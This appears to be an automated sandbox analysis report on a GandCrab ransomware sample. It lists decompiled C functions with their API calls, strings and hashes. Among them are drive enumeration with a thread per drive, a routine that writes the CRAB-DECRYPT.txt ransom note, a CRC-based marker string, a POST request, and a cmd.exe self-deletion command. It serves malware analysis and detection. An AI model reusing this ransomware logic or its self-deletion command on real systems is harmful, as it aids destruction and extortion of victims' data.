Part of subcall function 0FBB5220: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0FBB5288
Part of subcall function 0FBB5220: Sleep.KERNEL32(000003E8), ref: 0FBB52C5
Part of subcall function 0FBB5220: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FBB52D3
Part of subcall function 0FBB5220: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FBB52E3
Part of subcall function 0FBB5220: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FBB52FF
Part of subcall function 0FBB5220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB5310
Part of subcall function 0FBB5220: wsprintfW.USER32 ref: 0FBB5328
Part of subcall function 0FBB5220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB5339

lstrlenA.KERNEL32(00000000,00000000,00000000,74CB6980), ref: 0FBB5512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBB5532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0FBB5544
lstrcatA.KERNEL32(00000000,?), ref: 0FBB555E
lstrlenA.KERNEL32(00000000), ref: 0FBB55B3
lstrlenW.KERNEL32(?), ref: 0FBB55BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0FBB55DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB5637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FBB5643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FBB564D
InternetCloseHandle.WININET(0FBB581B), ref: 0FBB5657

Strings

POST, xrefs: 0FBB55CA
popkadurak, xrefs: 0FBB55E9

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Open$CloseHandleSleeplstrcatlstrcmpiwsprintf
String ID: POST$popkadurak
API String ID: 2554059081-2707760125
Opcode ID: 08d3425f065d4a739dc835e6107a3e4d78eb98cdf3267fc85645f22205ca4932
Instruction ID: 1d33b07785619a98dfeeea944932fbaf3f164e993423e68cbd7307418ba7d7a4
Opcode Fuzzy Hash: 08d3425f065d4a739dc835e6107a3e4d78eb98cdf3267fc85645f22205ca4932
Instruction Fuzzy Hash: F541B375D00309A6EB209BA9EC51FFD7B7CEB88711F140159EA40B3181EBF86645CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB72A0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FBB72A0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

APIs

lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72F2
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72FD
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7313
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB731E
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7334
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB733F
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7355
lstrlenW.KERNEL32(0FBB4B36,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7360
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7376
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7381
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7397
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73A2
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73C1
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73CC
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73E8
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73F6

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: eeb4ba310261e5107be08dfd79974ec14166adf4a955cd5f2db3d0c126e69d8d
Instruction ID: d091b7d9ab33f203b1852c5c5adac06e7df6961bc4553ac0956f4d4c05e1995b
Opcode Fuzzy Hash: eeb4ba310261e5107be08dfd79974ec14166adf4a955cd5f2db3d0c126e69d8d
Instruction Fuzzy Hash: 43413D32500612FFC7125FA9EDC8798B7A6FF04326F884538E80283A61D7B5A479DF80

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB5F00 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66
stringmemorylibraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0FBB5F00(void* __ecx, intOrPtr __edx, void* __esi) {
				CHAR* _v8;
				intOrPtr _v12;
				char _v267;
				char _v268;
				CHAR* _t10;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t20;
				void* _t24;
				void* _t31;
				void* _t35;

				_t10 =  *0xfbc2a78; // 0x0
				_v12 = __edx;
				_t24 = __ecx;
				_v8 = _t10;
				_t31 = VirtualAlloc(0, 0xa, 0x3000, 4);
				if(_t31 != 0) {
					_t13 = GetModuleHandleA("ntdll.dll");
					if(_t13 != 0) {
						_t20 = GetProcAddress(_t13, "RtlComputeCrc32");
						wsprintfA(_t31, "%Xeuropol",  *_t20(0x29a, _v8, lstrlenA(_v8), __esi));
						_t35 = _t35 + 0xc;
					}
					_v268 = 0;
					E0FBB9170( &_v267, 0, 0xff);
					E0FBB5DC0( &_v268, _t31, lstrlenA(_t31));
					E0FBB5E70( &_v268, _t24, _v12);
					VirtualFree(_t31, 0, 0x8000);
				}
				return _t24;
			}

APIs

VirtualAlloc.KERNEL32(00000000,0000000A,00003000,00000004,00000000,00000000), ref: 0FBB5F23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0FBB5F38
GetProcAddress.KERNEL32(00000000,RtlComputeCrc32), ref: 0FBB5F49
lstrlenA.KERNEL32(00000000), ref: 0FBB5F54
wsprintfA.USER32 ref: 0FBB5F6C
_memset.LIBCMT ref: 0FBB5F8B
lstrlenA.KERNEL32(00000000), ref: 0FBB5F94
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB5FC3

Strings

%Xeuropol, xrefs: 0FBB5F66
RtlComputeCrc32, xrefs: 0FBB5F43
ntdll.dll, xrefs: 0FBB5F33

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtuallstrlen$AddressAllocFreeHandleModuleProc_memsetwsprintf
String ID: %Xeuropol$RtlComputeCrc32$ntdll.dll
API String ID: 218840185-1387466253
Opcode ID: 506d8631de177b466dd9b362789c3a08d22c7b1fd70c086d642ccf8bdabe6c7f
Instruction ID: a754c5c5811a2cfdf76fec65d155e65bed1cade5a6b3a51eaa75695767193501
Opcode Fuzzy Hash: 506d8631de177b466dd9b362789c3a08d22c7b1fd70c086d642ccf8bdabe6c7f
Instruction Fuzzy Hash: 31110335E40304BBD7205BA9BC49FFE7A6CAB05B11F0000A8F904A3181DAF859518E51

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6D40 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB6D40(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\CRAB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xfbc2a64; // 0xfbc2000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xfbc2a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0fbb6d5b
0x0fbb6d63
0x0fbb6d85
0x0fbb6d8a
0x0fbb6d9e
0x0fbb6da5
0x0fbb6dbe
0x0fbb6dbe
0x0fbb6dc5
0x0fbb6dcb
0x0fbb6d8c
0x0fbb6d99
0x0fbb6d99
0x0fbb6dd8
0x0fbb6de6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FBB6E22,00000000,?,?), ref: 0FBB6D55
wsprintfW.USER32 ref: 0FBB6D63
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FBB6D7F
GetLastError.KERNEL32(?,?), ref: 0FBB6D8C
lstrlenW.KERNEL32(0FBC2000,?,00000000,?,?), ref: 0FBB6DAE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0FBB6DBE
CloseHandle.KERNEL32(00000000,?,?), ref: 0FBB6DC5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FBB6DD8

Strings

%s\CRAB-DECRYPT.txt, xrefs: 0FBB6D5D

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\CRAB-DECRYPT.txt
API String ID: 2985722263-2724392667
Opcode ID: cca2fb8f846d9931366544b6edd6ab217d4db67a00cd536d93d3f10ed58706c0
Instruction ID: 0f7e86711909d5e8b615e52d9ee24df22da60b5701771df093bca6276a2129c5
Opcode Fuzzy Hash: cca2fb8f846d9931366544b6edd6ab217d4db67a00cd536d93d3f10ed58706c0
Instruction Fuzzy Hash: F90180357402007BE2201B66AD8AFAA3B5CDB46B26F100164FF05A71C0DAE869268E69

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB5350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB5350() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x0fbb5376
0x0fbb537a
0x0fbb537e
0x0fbb5388
0x0fbb5390
0x0fbb5399
0x0fbb53b3
0x0fbb53b3
0x0fbb5390
0x0fbb53bb

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0FBB54E9,00000000,?,?,?,?,0FBB5615,00000000,popkadurak,00000000), ref: 0FBB5366
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB5378
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB5388
wsprintfW.USER32 ref: 0FBB5399
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0FBB53B3
ExitProcess.KERNEL32 ref: 0FBB53BB

Strings

cmd.exe, xrefs: 0FBB53A7
/c timeout -c 5 & del "%s" /f /q, xrefs: 0FBB5393
open, xrefs: 0FBB53AC

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: 677d1ee6ecc2473ef5a502dd66999ca7ffd7f20ae95dd13b406950e2eabd8058
Instruction ID: fb14ffd16751583c81c1d3efc72646e13cd50f7df47993d919a34ae4de6100ff
Opcode Fuzzy Hash: 677d1ee6ecc2473ef5a502dd66999ca7ffd7f20ae95dd13b406950e2eabd8058
Instruction Fuzzy Hash: 88F03031BC171033F17116A62C1FFAB2D2C9B46F22F240048FB05BF1C289E464128EA9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB2C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBB2C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xfbbf290; // 0x21
				asm("movdqu xmm0, [0xfbbf280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0FBB2AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0FBB2C8A
BeginPaint.USER32(?,?), ref: 0FBB2C9F
lstrlenW.KERNEL32(?), ref: 0FBB2CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0FBB2CBD
EndPaint.USER32(?,?), ref: 0FBB2CCB
CreateThread.KERNEL32 ref: 0FBB2CE9
DestroyWindow.USER32(?), ref: 0FBB2CF2

Strings

GandCrab!, xrefs: 0FBB2C5E

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: e22e25f28387d8426cda91171372309f870cd9c2c0830109fa5758eae7ff797b
Instruction ID: 1a1e9ba6c0a891d137912936916b451112147fffa96b96fd347b7d01f2d82606
Opcode Fuzzy Hash: e22e25f28387d8426cda91171372309f870cd9c2c0830109fa5758eae7ff797b
Instruction Fuzzy Hash: CB117932904209BBD711DF68EC0AFAA7BACEB49322F00461AFD4596190E7B199218F91

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB3FF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBB3FF0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xfbbf350; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0FBB6F40, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0FBB5670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0FBB4010
GetTickCount.KERNEL32 ref: 0FBB4035
GetDriveTypeW.KERNEL32(?), ref: 0FBB405A
CreateThread.KERNEL32 ref: 0FBB4099
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0FBB40DB
GetTickCount.KERNEL32 ref: 0FBB40E1

Strings

?:\, xrefs: 0FBB4023

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 9be4fe6b355ead4bedc0e52337c5275161320b485aa4222fea4b472cc7494882
Instruction ID: 2b0476b76c41937ccad02b6723ab74c941f460f1e662eaeec19f243726ab03d3
Opcode Fuzzy Hash: 9be4fe6b355ead4bedc0e52337c5275161320b485aa4222fea4b472cc7494882
Instruction Fuzzy Hash: 195133709083009FC310CF19D884BAABBE5FF88325F504A5DEA899B391D3B5A944CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB6F40(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0FBB6DF0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x0fbb6f59
0x0fbb6f5f
0x0fbb6f6e
0x0fbb6f7c
0x0fbb6f90
0x0fbb6f98
0x0fbb6fa0
0x0fbb6fa8
0x0fbb6fb6
0x0fbb6fcb
0x0fbb6fdb
0x0fbb6fe3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0FBB6F59
wsprintfW.USER32 ref: 0FBB6F6E
InitializeCriticalSection.KERNEL32(?), ref: 0FBB6F7C
VirtualAlloc.KERNEL32 ref: 0FBB6FB0

Part of subcall function 0FBB6DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBB6E23
Part of subcall function 0FBB6DF0: lstrcatW.KERNEL32(00000000,0FBBFF44), ref: 0FBB6E3B
Part of subcall function 0FBB6DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBB6E45

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0FBB6FDB
ExitThread.KERNEL32 ref: 0FBB6FE3

Strings

%c:\, xrefs: 0FBB6F68

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
